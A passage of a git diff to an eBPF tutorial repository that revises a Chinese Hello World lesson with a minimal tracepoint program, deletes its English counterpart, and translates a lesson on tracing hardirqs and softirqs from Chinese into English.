+在开始编写eBPF程序之前,我们需要准备一个合适的开发环境,并了解eBPF程序的基本开发流程。本部分将详细介绍这些内容。 + +### 安装必要的软件和工具 + +要开发eBPF程序,您需要安装以下软件和工具: + +- Linux 内核:由于eBPF是内核技术,因此您需要具备较新版本的Linux内核(至少 4.8 及以上版本,建议至少在 5.15 以上),以支持eBPF功能。 + - 建议使用最新的 Ubuntu 版本(例如 Ubuntu 23.10)以获得最佳的学习体验,较旧的内核 eBPF 功能支持可能相对不全。 +- LLVM 和 Clang:这些工具用于编译eBPF程序。安装最新版本的LLVM和Clang可以确保您获得最佳的eBPF支持。 + +eBPF 程序主要由两部分构成:内核态部分和用户态部分。内核态部分包含 eBPF 程序的实际逻辑,用户态部分负责加载、运行和监控内核态程序。 + +当您选择了合适的开发框架后,如BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以BCC工具为例,我们将介绍eBPF程序的基本开发流程: + +1. 安装BCC工具:根据您的Linux发行版,按照BCC官方文档的指南安装BCC工具和相关依赖。 +2. 编写eBPF程序(C语言):使用C语言编写一个简单的eBPF程序,例如Hello World程序。该程序可以在内核空间执行并完成特定任务,如统计网络数据包数量。 +3. 编写用户态程序(Python或C等):使用Python、C等语言编写用户态程序,用于加载、运行eBPF程序以及与之交互。在这个程序中,您需要使用BCC提供的API来加载和操作内核态的eBPF程序。 +4. 编译eBPF程序:使用BCC工具,将C语言编写的eBPF程序编译成内核可以执行的字节码。BCC会在运行时动态从源码编译eBPF程序。 +5. 加载并运行eBPF程序:在用户态程序中,使用BCC提供的API加载编译好的eBPF程序到内核空间,然后运行该程序。 +6. 与eBPF程序交互:用户态程序通过BCC提供的API与eBPF程序交互,实现数据收集、分析和展示等功能。例如,您可以使用BCC API读取eBPF程序中的map数据,以获取网络数据包统计信息。 +7. 卸载eBPF程序:当不再需要eBPF程序时,用户态程序应使用BCC API将其从内核空间卸载。 +8. 调试与优化:使用 bpftool 等工具进行eBPF程序的调试和优化,提高程序性能和稳定性。 + +通过以上流程,您可以使用BCC工具开发、编译、运行和调试eBPF程序。请注意,其他框架(如libbpf、cilium/ebpf和eunomia-bpf)的开发流程大致相似但略有不同,因此在选择框架时,请参考相应的官方文档和示例。 + +通过这个过程,你可以开发出一个能够在内核中运行的 eBPF 程序。eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。它基于 libbpf 的 CO-RE 轻量级开发框架,支持通过用户态 WASM 虚拟机控制 eBPF 程序的加载和执行,并将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块进行分发。我们会使用 eunomia-bpf 进行演示。 + +## 下载安装 eunomia-bpf 开发工具 + +可以通过以下步骤下载和安装 eunomia-bpf: + +下载 ecli 工具,用于运行 eBPF 程序: + +```console +$ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli +$ ./ecli -h +Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args +``` + +下载编译器工具链,用于将 eBPF 内核代码编译为 config 文件或 WASM 模块: + +```console +$ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc +$ ./ecc -h +eunomia-bpf compiler +Usage: ecc [OPTIONS] [EXPORT_EVENT_HEADER] +``` + +注:假如在 aarch64 平台上,请从 release 下载 [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) 和 [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64). + +也可以使用 docker 镜像进行编译: + +```console +$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # 使用 docker 进行编译。`pwd` 应该包含 *.bpf.c 文件和 *.h 文件。 +export PATH=PATH:~/.eunomia/bin +Compiling bpf object... +Packing ebpf object and config into /src/package.json... +``` + +## Hello World - minimal eBPF program + +我们会先从一个简单的 eBPF 程序开始,它会在内核中打印一条消息。我们会使用 eunomia-bpf 的编译器工具链将其编译为 bpf 字节码文件,然后使用 ecli 工具加载并运行该程序。作为示例,我们可以暂时省略用户态程序的部分。 + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#define BPF_NO_GLOBAL_DATA +#include +#include +#include + +typedef unsigned int u32; +typedef int pid_t; +const pid_t pid_filter = 0; + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("tp/syscalls/sys_enter_write") +int handle_tp(void *ctx) +{ + pid_t pid = bpf_get_current_pid_tgid() >> 32; + if (pid_filter && pid != pid_filter) + return 0; + bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid); + return 0; +} +``` + +这段程序通过定义一个 handle_tp 函数并使用 SEC 宏把它附加到 sys_enter_write tracepoint(即在进入 write 系统调用时执行)。该函数通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 write 系统调用的进程 ID,并在内核日志中打印出来。 + +- `bpf_printk()`: 一种将信息输出到trace_pipe(/sys/kernel/debug/tracing/trace_pipe)简单机制。 在一些简单用例中这样使用没有问题, but它也有一些限制:最多3 参数; 第一个参数必须是%s(即字符串);同时trace_pipe在内核中全局共享,其他并行使用trace_pipe的程序有可能会将 trace_pipe 的输出扰乱。 一个更好的方式是通过 BPF_PERF_OUTPUT(), 稍后将会讲到。 +- `void *ctx`:ctx本来是具体类型的参数, 但是由于我们这里没有使用这个参数,因此就将其写成void *类型。 +- `return 0`;:必须这样,返回0 (如果要知道why, 参考 #139 )。 + +要编译和运行这段程序,可以使用 ecc 工具和 ecli 命令。首先在 Ubuntu/Debian 上,执行以下命令: + +```shell +sudo apt install clang llvm +``` + +使用 ecc 编译程序: + +```console +$ ./ecc minimal.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +或使用 docker 镜像进行编译: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +然后使用 ecli 运行编译后的程序: + +```console +$ sudo ./ecli run package.json +Running eBPF program... +``` + +运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write" + <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. + <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. +``` + +按 Ctrl+C 停止 ecli 进程之后,可以看到对应的输出也停止。 + +注意:如果正在使用的 Linux 发行版(例如 Ubuntu )默认情况下没有启用跟踪子系统可能看不到任何输出,使用以下指令打开这个功能: + +```console +$ sudo su +# echo 1 > /sys/kernel/debug/tracing/tracing_on +``` + +## eBPF 程序的基本框架 + +如上所述, eBPF 程序的基本框架包括: + +- 包含头文件:需要包含 等头文件。 +- 定义许可证:需要定义许可证,通常使用 "Dual BSD/GPL"。 +- 定义 BPF 函数:需要定义一个 BPF 函数,例如其名称为 handle_tp,其参数为 void *ctx,返回值为 int。通常用 C 语言编写。 +- 使用 BPF 助手函数:在例如 BPF 函数中,可以使用 BPF 助手函数 bpf_get_current_pid_tgid() 和 bpf_printk()。 +- 返回值 + +## tracepoints + +跟踪点(tracepoints)是内核静态插桩技术,在技术上只是放置在内核源代码中的跟踪函数,实际上就是在源码中插入的一些带有控制条件的探测点,这些探测点允许事后再添加处理函数。比如在内核中,最常见的静态跟踪方法就是 printk,即输出日志。又比如:在系统调用、调度程序事件、文件系统操作和磁盘 I/O 的开始和结束时都有跟踪点。跟踪点于 2009 年在 Linux 2.6.32 版本中首次提供。跟踪点是一种稳定的 API,数量有限。 + +## GitHub 模板:轻松构建 eBPF 项目和开发环境 + +面对创建一个 eBPF 项目,您是否对如何开始搭建环境以及选择编程语言感到困惑?别担心,我们为您准备了一系列 GitHub 模板,以便您快速启动一个全新的eBPF项目。只需在GitHub上点击 `Use this template` 按钮,即可开始使用。 + +- :基于C语言和 libbpf 框架的eBPF项目模板 +- :基于Go语言和cilium/ebpf框架的eBPF项目模板 +- :基于Rust语言和libbpf-rs框架的eBPF项目模板 +- :基于C语言和eunomia-bpf框架的eBPF项目模板 + +这些启动模板包含以下功能: + +- 一个 Makefile,让您可以一键构建项目 +- 一个 Dockerfile,用于为您的 eBPF 项目自动创建一个容器化环境并发布到 Github Packages +- GitHub Actions,用于自动化构建、测试和发布流程 +- eBPF 开发所需的所有依赖项 + +> 通过将现有仓库设置为模板,您和其他人可以快速生成具有相同基础结构的新仓库,从而省去了手动创建和配置的繁琐过程。借助 GitHub 模板仓库,开发者可以专注于项目的核心功能和逻辑,而无需为基础设置和结构浪费时间。更多关于模板仓库的信息,请参阅官方文档: + +## 总结 + +eBPF 程序的开发和使用流程可以概括为如下几个步骤: + +- 定义 eBPF 程序的接口和类型:这包括定义 eBPF 程序的接口函数,定义和实现 eBPF 内核映射(maps)和共享内存(perf events),以及定义和使用 eBPF 内核帮助函数(helpers)。 +- 编写 eBPF 程序的代码:这包括编写 eBPF 程序的主要逻辑,实现 eBPF 内核映射的读写操作,以及使用 eBPF 内核帮助函数。 +- 编译 eBPF 程序:这包括使用 eBPF 编译器(例如 clang)将 eBPF 程序代码编译为 eBPF 字节码,并生成可执行的 eBPF 内核模块。ecc 本质上也是调用 clang 编译器来编译 eBPF 程序。 +- 加载 eBPF 程序到内核:这包括将编译好的 eBPF 内核模块加载到 Linux 内核中,并将 eBPF 程序附加到指定的内核事件上。 +- 使用 eBPF 程序:这包括监测 eBPF 程序的运行情况,并使用 eBPF 内核映射和共享内存进行数据交换和共享。 +- 在实际开发中,还可能需要进行其他的步骤,例如配置编译和加载参数,管理 eBPF 内核模块和内核映射,以及使用其他高级功能等。 + +需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。 + +您还可以访问我们的教程代码仓库 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 + +> 原文地址: 转载请注明出处。 diff --git a/src/1-helloworld/README_en.md b/src/1-helloworld/README_en.md deleted file mode 100644 index a94181a..0000000 --- a/src/1-helloworld/README_en.md +++ /dev/null @@ -1,195 +0,0 @@ -# eBPF Tutorial by Example 1: Hello World, Framework and Development - -In this blog post, we will delve into the basic framework and development process of eBPF (Extended Berkeley Packet Filter). eBPF is a powerful network and performance analysis tool that runs on the Linux kernel, providing developers with the ability to dynamically load, update, and run user-defined code at kernel runtime. This enables developers to implement efficient, secure kernel-level network monitoring, performance analysis, and troubleshooting functionalities. - -This article is the second part of the eBPF Tutorial by Example, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial. - -When developing eBPF programs, there are multiple development frameworks to choose from, such as BCC (BPF Compiler Collection) libbpf, cilium/ebpf, eunomia-bpf, etc. Although these tools have different characteristics, their basic development process is similar. In the following content, we will delve into these processes and use the Hello World program as an example to guide readers in mastering the basic skills of eBPF development. - -This tutorial will help you understand the basic structure of eBPF programs, the compilation and loading process, the interaction between user space and kernel space, as well as debugging and optimization techniques. By studying this tutorial, you will master the basic knowledge of eBPF development and lay a solid foundation for further learning and practice. - -## Preparation of eBPF Development Environment and Basic Development Process - -Before starting to write eBPF programs, we need to prepare a suitable development environment and understand the basic development process of eBPF programs. This section will provide a detailed introduction to these subjects. - -### Installing the necessary software and tools - -To develop eBPF programs, you need to install the following software and tools: - -- Linux kernel: Since eBPF is a kernel technology, you need to have a relatively new version of the Linux kernel (minimum version 4.8 and above, suggested version is 5.15+ or 6.2+) to support eBPF functionality. - - If possible, install a new version of Ubuntu (e.g. 23.10) would be better. -- LLVM and Clang: These tools are used to compile eBPF programs. Installing the latest version of LLVM and Clang ensures that you get the best eBPF support. - -An eBPF program consists of two main parts: the kernel space part and the user space part. The kernel space part contains the actual logic of the eBPF program, while the user space part is responsible for loading, running, and monitoring the kernel space program. - -Once you have chosen a suitable development framework, such as BCC (BPF Compiler Collection), libbpf, cilium/ebpf, or eunomia-bpf, you can begin developing the user space and kernel space programs. Taking the BCC tool as an example, we will introduce the basic development process of eBPF programs: - -1. Installing the BCC tool: Depending on your Linux distribution, follow the guidelines in the BCC documentation to install the BCC tool and its dependencies. -2. Writing an eBPF program (C language): Use the C language to write a simple eBPF program, such as the Hello World program. This program can be executed in kernel space and perform specific tasks, such as counting network packets. -3. Writing a user space program (Python or C, etc.): Use languages like Python or C to write a user space program that is responsible for loading, running, and interacting with the eBPF program. In this program, you need to use the API provided by BCC to load and manipulate the kernel space eBPF program. -4. Compiling the eBPF program: Use the BCC tool to compile the eBPF program written in C language into bytecode that can be executed by the kernel. BCC dynamically compiles the eBPF program from source code at runtime. -5. Loading and running the eBPF program: In the user space program, use the API provided by BCC to load the compiled eBPF program into kernel space and then run it. -6. Interacting with the eBPF program: The user space program interacts with the eBPF program through the API provided by BCC, implementing data collection, analysis, and display functions. For example, you can use the BCC API to read map data in the eBPF program to obtain network packet statistics. -7. Unloading the eBPF program: When the eBPF program is no longer needed, the user space program should unload it from the kernel space using the BCC API. -8. Debugging and optimization: Use tools like bpftool to debug and optimize eBPF programs, improving program performance and stability. - -Through the above process, you can develop, compile, run, and debug eBPF programs using the BCC tool. Note that the development process of other frameworks, such as libbpf, cilium/ebpf, and eunomia-bpf, is similar but slightly different. Therefore, when choosing a framework, please refer to the respective official documentation and examples. - -By following this process, you can develop an eBPF program that runs in the kernel. eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain. It aims to simplify the development, building, distribution, and running of eBPF programs. It is based on the libbpf CO-RE lightweight development framework, supports loading and executing eBPF programs through a user space WebAssembly (WASM) virtual machine, and packages precompiled eBPF programs into universal JSON or WASM modules for distribution. We will use eunomia-bpf for demonstration purposes. - -## Download and Install eunomia-bpf Development Tools - -You can download and install eunomia-bpf using the following steps: - -Download the ecli tool for running eBPF programs: - -```console -$ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli -$ ./ecli -h -Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args -``` - -Download the compiler toolchain for compiling eBPF kernel code into config files or WASM modules: - -```console -$ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc -$ ./ecc -h -eunomia-bpf compiler -Usage: ecc [OPTIONS] [EXPORT_EVENT_HEADER] -.... -``` - -Note: If you are on the aarch64 platform, please use the [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) and [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64). - -You can also compile using the docker image: - -```console -$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # Compile using docker. `pwd` should contain *.bpf.c files and *.h files. -export PATH=PATH:~/.eunomia/bin -Compiling bpf object... -Packing ebpf object and config into /src/package.json... -``` - -## Hello World - minimal eBPF program - -We will start with a simple eBPF program that prints a message in the kernel. We will use the eunomia-bpf compiler toolchain to compile it into a BPF bytecode file, and then load and run the program using the ecli tool. For the sake of the example, we can temporarily disregard the user space program. - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -#define BPF_NO_GLOBAL_DATA -#include -#include -#include - -typedef unsigned int u32; -typedef int pid_t; -const pid_t pid_filter = 0; - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("tp/syscalls/sys_enter_write") -int handle_tp(void *ctx) -{ - pid_t pid = bpf_get_current_pid_tgid() >> 32; - if (pid_filter && pid != pid_filter) - return 0; - bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid); - return 0; -} -``` - -This program defines a handle_tp function and attaches it to the sys_enter_write tracepoint using the SEC macro (i.e., it is executed when the write system call is entered). The function retrieves the process ID of the write system call invocation using the bpf_get_current_pid_tgid and bpf_printk functions, and prints it in the kernel log. - -- `bpf_trace_printk()`: A simple mechanism to output information to the trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is fine for simple use cases, but it has limitations: a maximum of 3 parameters; the first parameter must be %s (i.e., a string); and the trace_pipe is globally shared in the kernel, so other programs using the trace_pipe concurrently might disrupt its output. A better approach is to use BPF_PERF_OUTPUT(), which will be discussed later. -- `void *ctx`: ctx is originally a parameter of a specific type, but since it is not used here, it is written as void *. -- `return 0;`: This is necessary, returning 0 (to know why, refer to #139 ). - -To compile and run this program, you can use the ecc tool and ecli command. First, on Ubuntu/Debian, execute the following command: - -```shell -sudo apt install clang llvm -``` - -Compile the program using ecc: - -```console -$ ./ecc minimal.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Or compile using a docker image: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Then run the compiled program using ecli: - -```console -$ sudo ./ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write" - <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. - <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. -``` - -Once you stop the ecli process by pressing Ctrl+C, the corresponding output will also stop. - -Note: If your Linux distribution (e.g. Ubuntu) does not have the tracing subsystem enabled by default, you may not see any output. Use the following command to enable this feature: - -```console -$ sudo su -# echo 1 > /sys/kernel/debug/tracing/tracing_on -``` - -## Basic Framework of eBPF Program - -As mentioned above, the basic framework of an eBPF program includes: - -- Including header files: You need to include and header files, among others. -- Defining a license: You need to define a license, typically using "Dual BSD/GPL". -- Defining a BPF function: You need to define a BPF function, for example, named handle_tp, which takes void *ctx as a parameter and returns int. This is usually written in the C language. -- Using BPF helper functions: In the BPF function, you can use BPF helper functions such as bpf_get_current_pid_tgid() and bpf_printk(). -- Return value - -## Tracepoints - -Tracepoints are a kernel static instrumentation technique, technically just trace functions placed in the kernel source code, which are essentially probe points with control conditions inserted into the source code, allowing post-processing with additional processing functions. For example, the most common static tracing method in the kernel is printk, which outputs log messages. For example, there are tracepoints at the start and end of system calls, scheduler events, file system operations, and disk I/O. Tracepoints were first introduced in Linux version 2.6.32 in 2009. Tracepoints are a stable API and their number is limited. - -## GitHub Templates: Build eBPF Projects and Development Environments Easily - -When faced with creating an eBPF project, are you confused about how to set up the environment and choose a programming language? Don't worry, we have prepared a series of GitHub templates to help you quickly start a brand new eBPF project. Just click the `Use this template` button on GitHub to get started. - -- : eBPF project template based on the C language and libbpf framework. -- : eBPF project template based on the Go language and cilium/ebpf framework. -- : eBPF project template based on the Rust language and libbpf-rs framework. -- : eBPF project template based on the C language and eunomia-bpf framework. - -These starter templates include the following features: - -- A Makefile for building the project with one command. -- A Dockerfile for automatically creating a containerized environment for your eBPF project and publishing it to Github Packages.- GitHub Actions, used for automating build, test, and release processes -- All dependencies required for eBPF development - -> By setting an existing repository as a template, you and others can quickly generate new repositories with the same underlying structure, eliminating the tedious process of manual creation and configuration. With GitHub template repositories, developers can focus on the core functionality and logic of their projects without wasting time on setup and structure. For more information about template repositories, please refer to the official documentation: - -## Summary - -The development and usage process of eBPF programs can be summarized in the following steps: - -- Define the interface and types of eBPF programs: This includes defining the interface functions of eBPF programs, defining and implementing eBPF kernel maps and shared memory (perf events), and defining and using eBPF kernel helper functions. -- Write the code for eBPF programs: This includes writing the main logic of the eBPF program, implementing read and write operations on eBPF kernel maps, and using eBPF kernel helper functions. -- Compile the eBPF program: This includes using an eBPF compiler (such as clang) to compile the eBPF program code into eBPF bytecode and generate an executable eBPF kernel module. ecc essentially calls the clang compiler to compile eBPF programs. -- Load the eBPF program into the kernel: This includes loading the compiled eBPF kernel module into the Linux kernel and attaching the eBPF program to the specified kernel events. -- Use the eBPF program: This includes monitoring the execution of the eBPF program and exchanging and sharing data using eBPF kernel maps and shared memory. -- In practical development, there may be additional steps such as configuring compilation and loading parameters, managing eBPF kernel modules and kernel maps, and using other advanced features. - -It should be noted that the execution of BPF programs occurs in the kernel space, so special tools and techniques are needed to write, compile, and debug BPF programs. eunomia-bpf is an open-source BPF compiler and toolkit that can help developers write and run BPF programs quickly and easily. - -You can also visit our tutorial code repository or website or website for more examples and complete tutorials, all of which are open-source. We will continue to share more about eBPF development practices to help you better understand and master eBPF technology. diff --git a/src/10-hardirqs/README.md b/src/10-hardirqs/README.md index 33e8173..4de28a9 100644 --- a/src/10-hardirqs/README.md +++ b/src/10-hardirqs/README.md @@ -1,37 +1,37 @@ -# eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 +# eBPF Tutorial by Example 10: Capturing Interrupts with hardirqs or softirqs -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. -本文是 eBPF 入门开发实践教程的第十篇,在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件。 -hardirqs 和 softirqs 是 Linux 内核中两种不同类型的中断处理程序。它们用于处理硬件设备产生的中断请求,以及内核中的异步事件。在 eBPF 中,我们可以使用同名的 eBPF 工具 hardirqs 和 softirqs 来捕获和分析内核中与中断处理相关的信息。 +This article is the tenth part of the eBPF Tutorial by Example, focusing on capturing interrupt events using hardirqs or softirqs in eBPF. +hardirqs and softirqs are two different types of interrupt handlers in the Linux kernel. They are used to handle interrupt requests generated by hardware devices, as well as asynchronous events in the kernel. In eBPF, we can use the eBPF tools hardirqs and softirqs to capture and analyze information related to interrupt handling in the kernel. -## hardirqs 和 softirqs 是什么? +## What are hardirqs and softirqs? -hardirqs 是硬件中断处理程序。当硬件设备产生一个中断请求时,内核会将该请求映射到一个特定的中断向量,然后执行与之关联的硬件中断处理程序。硬件中断处理程序通常用于处理设备驱动程序中的事件,例如设备数据传输完成或设备错误。 +hardirqs are hardware interrupt handlers. When a hardware device generates an interrupt request, the kernel maps it to a specific interrupt vector and executes the associated hardware interrupt handler. Hardware interrupt handlers are commonly used to handle events in device drivers, such as completion of device data transfer or device errors. -softirqs 是软件中断处理程序。它们是内核中的一种底层异步事件处理机制,用于处理内核中的高优先级任务。softirqs 通常用于处理网络协议栈、磁盘子系统和其他内核组件中的事件。与硬件中断处理程序相比,软件中断处理程序具有更高的灵活性和可配置性。 +softirqs are software interrupt handlers. They are a low-level asynchronous event handling mechanism in the kernel, used for handling high-priority tasks in the kernel. softirqs are commonly used to handle events in the network protocol stack, disk subsystem, and other kernel components. Compared to hardware interrupt handlers, software interrupt handlers have more flexibility and configurability. -## 实现原理 +## Implementation Details -在 eBPF 中,我们可以通过挂载特定的 kprobe 或者 tracepoint 来捕获和分析 hardirqs 和 softirqs。为了捕获 hardirqs 和 softirqs,需要在相关的内核函数上放置 eBPF 程序。这些函数包括: +In eBPF, we can capture and analyze hardirqs and softirqs by attaching specific kprobes or tracepoints. To capture hardirqs and softirqs, eBPF programs need to be placed on relevant kernel functions. These functions include: -- 对于 hardirqs:irq_handler_entry 和 irq_handler_exit。 -- 对于 softirqs:softirq_entry 和 softirq_exit。 +- For hardirqs: irq_handler_entry and irq_handler_exit. +- For softirqs: softirq_entry and softirq_exit. -当内核处理 hardirqs 或 softirqs 时,这些 eBPF 程序会被执行,从而收集相关信息,如中断向量、中断处理程序的执行时间等。收集到的信息可以用于分析内核中的性能问题和其他与中断处理相关的问题。 +When the kernel processes hardirqs or softirqs, these eBPF programs are executed to collect relevant information such as interrupt vectors, execution time of interrupt handlers, etc. The collected information can be used for analyzing performance issues and other interrupt handling related problems in the kernel. -为了捕获 hardirqs 和 softirqs,可以遵循以下步骤: +To capture hardirqs and softirqs, the following steps can be followed: -1. 在 eBPF 程序中定义用于存储中断信息的数据结构和映射。 -2. 编写 eBPF 程序,将其挂载到相应的内核函数上,以捕获 hardirqs 或 softirqs。 -3. 在 eBPF 程序中,收集中断处理程序的相关信息,并将这些信息存储在映射中。 -4. 在用户空间应用程序中,读取映射中的数据以分析和展示中断处理信息。 +1. Define data structures and maps in eBPF programs for storing interrupt information. +2. Write eBPF programs and attach them to the corresponding kernel functions to capture hardirqs or softirqs. +3. In eBPF programs, collect relevant information about interrupt handlers and store this information in the maps. +4. In user space applications, read the data from the maps to analyze and display the interrupt handling information. -通过上述方法,我们可以在 eBPF 中使用 hardirqs 和 softirqs 捕获和分析内核中的中断事件,以识别潜在的性能问题和与中断处理相关的问题。 +By following the above approach, we can use hardirqs and softirqs in eBPF to capture and analyze interrupt events in the kernel, identifying potential performance issues and interrupt handling related problems. -## hardirqs 代码实现 +## Implementation of hardirqs Code -hardirqs 程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。 +The main purpose of the hardirqs program is to obtain the name, execution count, and execution time of interrupt handlers and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step. ```c // SPDX-License-Identifier: GPL-2.0 @@ -166,11 +166,11 @@ int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) char LICENSE[] SEC("license") = "GPL"; ``` -这段代码是一个 eBPF 程序,用于捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。 +This code is an eBPF program used to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel. The main purpose of the program is to obtain the name, execution count, and execution time of the interrupt handler, and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step. -1. 包含必要的头文件和定义数据结构: +1. Include necessary header files and define data structures: - ```c +```c #include #include #include @@ -178,14 +178,13 @@ char LICENSE[] SEC("license") = "GPL"; #include "hardirqs.h" #include "bits.bpf.h" #include "maps.bpf.h" - ``` +``` - 该程序包含了 eBPF 开发所需的标准头文件,以及用于定义数据结构和映射的自定义头文件。 +This program includes the standard header files required for eBPF development, as well as custom header files for defining data structures and maps. -2. 定义全局变量和映射: - - ```c +2. Define global variables and maps: +```c #define MAX_ENTRIES 256 const volatile bool filter_cg = false; @@ -194,18 +193,17 @@ char LICENSE[] SEC("license") = "GPL"; const volatile bool do_count = false; ... - ``` +``` - 该程序定义了一些全局变量,用于配置程序的行为。例如,`filter_cg` 控制是否过滤 cgroup,`targ_dist` 控制是否显示执行时间的分布等。此外,程序还定义了三个映射,分别用于存储 cgroup 信息、开始时间戳和中断处理程序的信息。 +This program defines some global variables that are used to configure the behavior of the program. For example, `filter_cg` controls whether to filter cgroups, `targ_dist` controls whether to display the distribution of execution time, etc. Additionally, the program defines three maps for storing cgroup information, start timestamps, and interrupt handler information. -3. 定义两个辅助函数 `handle_entry` 和 `handle_exit`: +3. Define two helper functions `handle_entry` and `handle_exit`: - 这两个函数分别在中断处理程序的入口和出口处被调用。`handle_entry` 记录开始时间戳或更新中断计数,`handle_exit` 计算中断处理程序的执行时间,并将结果存储到相应的信息映射中。 +These two functions are called at the entry and exit points of the interrupt handler. `handle_entry` records the start timestamp or updates the interrupt count, while `handle_exit` calculates the execution time of the interrupt handler and stores the result in the corresponding information map. -4. 定义 eBPF 程序的入口点: - - ```c +4. Define the entry points of the eBPF program: +```c SEC("tp_btf/irq_handler_entry") int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) { @@ -229,17 +227,17 @@ char LICENSE[] SEC("license") = "GPL"; { return handle_exit(irq, action); } - ``` +``` - 这里定义了四个 eBPF 程序入口点,分别用于捕获中断处理程序的入口和出口事件。`tp_btf` 和 `raw_tp` 分别代表使用 BPF Type Format(BTF)和原始 tracepoints 捕获事件。这样可以确保程序在不同内核版本上可以移植和运行。 +Here, four entry points of the eBPF program are defined, which are used to capture the entry and exit events of the interrupt handler. `tp_btf` and `raw_tp` represent capturing events using BPF Type Format (BTF) and raw tracepoints, respectively. This ensures that the program can be ported and run on different kernel versions. -Softirq 代码也类似,这里就不再赘述了。 +The code for Softirq is similar, and I won't elaborate on it here. -## 运行代码 +## Run code.Translated content -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -要编译这个程序,请使用 ecc 工具: +To compile this program, use the ecc tool: ```console $ ecc hardirqs.bpf.c @@ -247,16 +245,18 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -然后运行: +Then run: ```console sudo ecli run ./package.json ``` -## 总结 +## Summary -在本章节(eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件)中,我们学习了如何使用 eBPF 程序捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。我们详细讲解了示例代码,包括如何定义数据结构、映射以及 eBPF 程序入口点,以及如何在中断处理程序的入口和出口处调用辅助函数来记录执行信息。 +In this chapter (eBPF Tutorial by Example Ten: Capturing Interrupt Events in eBPF with Hardirqs or Softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, mappings, eBPF program 